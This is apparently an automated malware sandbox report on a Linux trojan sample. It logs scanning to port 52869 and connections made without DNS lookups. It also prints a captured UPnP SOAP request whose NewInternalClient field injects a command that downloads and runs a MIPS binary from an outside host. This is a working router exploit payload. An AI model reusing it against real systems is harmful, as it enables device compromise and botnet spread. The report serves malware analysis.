Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 185.132.148.237:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 91.197.227.214:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 185.118.70.89:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 91.92.233.155:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 91.171.230.31:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 45.51.36.36:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 91.34.213.232:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 185.115.163.210:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 91.82.252.9:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 45.25.106.20:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 45.255.184.186:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 185.234.69.35:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 45.186.48.43:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 91.19.92.99:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 185.3.218.230:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 185.189.197.100:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 91.250.213.22:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 45.114.160.167:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 45.71.154.197:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 91.213.199.85:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 91.126.54.38:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 91.220.197.128:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 185.66.212.127:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 45.91.246.41:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 185.153.101.200:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 91.169.64.178:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 45.105.196.59:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 185.43.48.5:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 45.114.149.82:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 91.113.242.19:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 45.181.172.120:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 45.66.251.37:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 45.187.205.205:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 45.121.233.224:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 45.41.77.158:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 45.43.14.243:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 91.104.93.58:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 185.246.162.75:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 185.122.145.244:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 91.185.75.66:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 45.65.70.125:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 91.109.69.74:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 45.198.72.129:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 91.126.106.120:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 185.80.241.248:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 45.52.81.115:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 91.192.24.27:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 45.197.167.17:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 185.220.178.244:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 45.239.197.121:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 91.22.49.82:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 185.135.191.194:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 91.190.133.20:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 91.102.7.55:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 91.193.237.222:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 185.248.180.139:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 91.19.148.48:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 91.136.41.48:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 185.191.158.79:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 45.140.50.150:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 45.240.233.239:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 91.40.9.49:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 91.132.250.192:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 91.102.28.246:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 91.206.198.9:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 185.174.3.124:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 91.35.152.218:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 185.168.68.86:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 45.120.230.141:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 45.29.7.101:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 45.157.13.24:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 185.201.93.12:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 185.18.143.2:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 45.165.68.140:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 45.70.156.21:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 91.188.207.45:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 91.17.13.230:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 91.193.56.50:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 45.203.90.104:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 91.238.220.105:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 91.47.94.97:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 91.197.119.232:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 91.34.14.181:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 91.3.75.39:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 185.206.10.195:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 185.202.189.197:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 91.17.106.201:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 185.148.180.81:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 185.84.89.12:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 45.224.38.41:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 185.234.68.103:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 91.97.48.123:52869
Source: global traffic	TCP traffic: 192.168.2.23:39976 -> 45.126.183.7:52869

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 95.244.211.33
Source: unknown	TCP traffic detected without corresponding DNS query: 95.244.211.33
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 148.24.242.140
Source: unknown	TCP traffic detected without corresponding DNS query: 165.21.219.131
Source: unknown	TCP traffic detected without corresponding DNS query: 82.97.109.140
Source: unknown	TCP traffic detected without corresponding DNS query: 157.190.18.42
Source: unknown	TCP traffic detected without corresponding DNS query: 108.90.152.125
Source: unknown	TCP traffic detected without corresponding DNS query: 211.46.144.5
Source: unknown	TCP traffic detected without corresponding DNS query: 121.117.93.163
Source: unknown	TCP traffic detected without corresponding DNS query: 48.49.253.63
Source: unknown	TCP traffic detected without corresponding DNS query: 57.161.224.218
Source: unknown	TCP traffic detected without corresponding DNS query: 41.214.15.64
Source: unknown	TCP traffic detected without corresponding DNS query: 1.240.179.83
Source: unknown	TCP traffic detected without corresponding DNS query: 174.25.12.89
Source: unknown	TCP traffic detected without corresponding DNS query: 221.127.163.114
Source: unknown	TCP traffic detected without corresponding DNS query: 87.22.230.143
Source: unknown	TCP traffic detected without corresponding DNS query: 151.133.209.114
Source: unknown	TCP traffic detected without corresponding DNS query: 102.182.198.178
Source: unknown	TCP traffic detected without corresponding DNS query: 190.162.241.27
Source: unknown	TCP traffic detected without corresponding DNS query: 191.150.162.210
Source: unknown	TCP traffic detected without corresponding DNS query: 145.5.254.50
Source: unknown	TCP traffic detected without corresponding DNS query: 9.88.156.174
Source: unknown	TCP traffic detected without corresponding DNS query: 130.87.134.157
Source: unknown	TCP traffic detected without corresponding DNS query: 169.201.165.160
Source: unknown	TCP traffic detected without corresponding DNS query: 67.243.203.64
Source: unknown	TCP traffic detected without corresponding DNS query: 143.179.190.137
Source: unknown	TCP traffic detected without corresponding DNS query: 205.73.167.17
Source: unknown	TCP traffic detected without corresponding DNS query: 71.90.1.54
Source: unknown	TCP traffic detected without corresponding DNS query: 42.76.89.20
Source: unknown	TCP traffic detected without corresponding DNS query: 82.62.162.189
Source: unknown	TCP traffic detected without corresponding DNS query: 62.41.141.92
Source: unknown	TCP traffic detected without corresponding DNS query: 168.54.23.110
Source: unknown	TCP traffic detected without corresponding DNS query: 216.151.161.28
Source: unknown	TCP traffic detected without corresponding DNS query: 206.38.85.54
Source: unknown	TCP traffic detected without corresponding DNS query: 85.109.52.252
Source: unknown	TCP traffic detected without corresponding DNS query: 12.245.200.60
Source: unknown	TCP traffic detected without corresponding DNS query: 218.111.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 118.2.167.65
Source: unknown	TCP traffic detected without corresponding DNS query: 216.132.98.66
Source: unknown	TCP traffic detected without corresponding DNS query: 73.36.121.247
Source: unknown	TCP traffic detected without corresponding DNS query: 194.200.77.126
Source: unknown	TCP traffic detected without corresponding DNS query: 32.15.235.132
Source: unknown	TCP traffic detected without corresponding DNS query: 143.194.6.66
Source: unknown	TCP traffic detected without corresponding DNS query: 169.85.159.201
Source: unknown	TCP traffic detected without corresponding DNS query: 153.112.79.126
Source: unknown	TCP traffic detected without corresponding DNS query: 66.1.152.161
Source: unknown	TCP traffic detected without corresponding DNS query: 124.130.35.129
Source: unknown	TCP traffic detected without corresponding DNS query: 133.41.168.210

Source: BitmCvTrdO, 5233.1.00000000a7ecdb85.000000008504b126.r-x.sdmp, BitmCvTrdO, 5233.1.000000009fa31006.000000000c96b774.rw-.sdmp	String found in binary or memory: http://194.87.42.3/Anti_Bins/Antisocial.mips
Source: BitmCvTrdO, 5233.1.00000000a7ecdb85.000000008504b126.r-x.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: BitmCvTrdO, 5233.1.00000000a7ecdb85.000000008504b126.r-x.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

Source: unknown

HTTP traffic detected: POST /picdesc.xml HTTP/1.1Host: 127.0.0.1:52869Content-Length: 630Accept-Encoding: gzip, deflateSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMappingAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Connection: keep-aliveData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6e 69 67 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 38 37 2e 34 32 2e 33 2f 41 6e 74 69 5f 42 69 6e 73 2f 41 6e 74 69 73 6f 63 69 61 6c 2e 6d 69 70 73 20 2d 4f 20 6e 69 67 3b 20 63 68 6d 6f 64 20 37 37 37 20 6e 69 67 3b 20 2e 2f 6e 69 67 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf nig; wget http://194.87.42.3/Anti_Bins/Antisocial.mips -O nig; chmod 777 nig; ./nig realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDurati

Source: ELF static info symbol of initial sample

.symtab present: no

Source: classification engine

Classification label: mal80.troj.lin@0/0@0/0

Source: BitmCvTrdO

Joe Sandbox Cloud Basic: Detection: clean Score: 0

Perma Link

Hooking and other Techniques for Hiding and Protection:

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 58106 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58110 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33720 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33724 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33720 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33724 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33720 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33724 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33720 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33724 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45730 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33112 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33112 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33112 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45730 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48862 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33116 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48866 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45178 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54094 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33724 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33720 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33112 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45730 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54094 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45178 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44346 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44348 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44346 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44348 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54094 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44346 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44348 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33116 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45178 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47454 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57800 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35248 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57810 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35258 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 57810
Source: unknown	Network traffic detected: HTTP traffic on port 45730 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33112 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44346 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44348 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60026 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43806 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54094 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60034 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57002 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57008 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47454 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57002 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34958 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43806 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50292 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50294 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33724 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33720 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50292 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47454 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50294 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44346 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44348 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50292 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50294 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43352 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50468 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43806 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42204 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42210 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34656 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50474 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50062 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45178 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50068 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42204 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42210 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35036 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50468 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50474 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50292 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50294 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42204 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42210 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34656 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43352 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50468 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50474 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35036 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47454 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54094 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42204 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42210 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60070 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44102 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45730 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33112 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44106 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49408 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 60070
Source: unknown	Network traffic detected: HTTP traffic on port 60076 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 60076
Source: unknown	Network traffic detected: HTTP traffic on port 44102 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34656 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44106 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55714 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34654 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60102 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34958 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43352 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50292 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39866 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50294 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44102 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44106 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43806 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35036 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50468 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33116 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49408 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50474 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44346 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44348 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55714 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39866 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44102 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44106 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42204 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42210 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60102 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49408 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50506 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34656 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55714 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39866 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37454 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47606 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37458 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47610 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60102 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44102 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35036 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43352 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44106 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50506 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54216 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47454 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46404 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50292 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49408 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50294 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45178 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54216 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39866 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50506 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55714 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33724 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33720 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40864 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43806 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42210 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42204 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44940 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44944 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54216 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40864 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50336 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34958 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50338 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60102 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34656 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53340 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40864 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44102 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44106 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54094 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49244 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57154 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51392 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 51392
Source: unknown	Network traffic detected: HTTP traffic on port 49266 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50506 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53340 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55412 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57154 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59630 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59640 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54216 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54410 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49562 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35036 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41150 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41002 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41156 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40864 -> 52869
